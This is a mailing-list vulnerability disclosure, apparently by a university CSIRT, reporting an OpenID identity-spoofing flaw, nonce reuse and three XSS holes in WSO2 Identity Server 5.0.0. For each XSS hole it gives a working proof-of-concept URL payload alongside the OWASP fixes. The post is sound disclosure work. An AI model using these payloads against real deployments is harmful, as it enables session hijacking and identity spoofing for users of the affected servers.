Hi, Since I've written several emails to individual persons responsible for WSO2 management and development, and haven't got any response, at last I've decided to post at maillist:
During penetration testing our Security Team (WCSS CSIRT) discovered a serious security vulnerabilities in WSO2 Identity Server version 5.0.0 (latest available on http://wso2.com/products/identity-server/). 1) Identity spoofing/authentication bypass. Attacker need to log in to WSO2 IS to obtain valid HTTP session. Given this session he/she can request OpenID assertion from WSO2 IS to _any_ identity (openid.identity). Thus any authenticated user is able to spoof any identity he/she requests in order to login to RP as user of his will. 2) XSS A - HTML injection https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%22XSS%22)%3e Note, that filter you use against XSS is easy to evade. Countermeasure: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet RULE#1 RULE#2 3) XSS B - HTML injection https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://www.wp.pl&openid.realm=http://www.wp.pl&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://www.wp.pl/test&openid.claimed_id=https://www.wp.pl/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%3eeval("ale"%2b"rt(1)")%3c%2f%73%63%72%69%70%74%3e&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL Seems there is not any filtering/escaping involved there. Countermeasure: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet RULE#1 RULE#2 4) XSS C - JavaScript injection https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://www.wp.pl&openid.realm=http://www.wp.pl&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://www.wp.pl/test&openid.claimed_id=https://www.wp.pl/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e-aaa"%0a};alert(1);%0aif(0){"&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL This is direct JavaScript injection, there is even no need to inject HTML tags. Countermeasure: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet#RULE_.233_-_JavaScript_Escape_Before_Inserting_Untrusted_Data_into_JavaScript_Data_Values As for these XSS bugs, this is very likely you are prone in many other places as well. Our audit was just as quick as possible. Please apply to above mentioned OWASP guides to rid of this XSS problems. Probably any other countermeasures will be ineffective, in particular any custom anti-XSS filters. 5) WSO2 IS breaks an important OpenID specification constraint concerning "nonce". "Nonce" must be used only "once", although WSO2 IS allows unlimited use of the same nonce value, see: http://openid.net/specs/openid-authentication-2_0.html#verify_nonce thanks, Bartlomiej Balcerek <[email protected]> Antoni Klajn <[email protected]> Wroclaw University of Technology, Poland Wroclaw Centre for Networking and Supercomputing _______________________________________________ Dev mailing list [email protected] http://wso2.org/cgi-bin/mailman/listinfo/dev
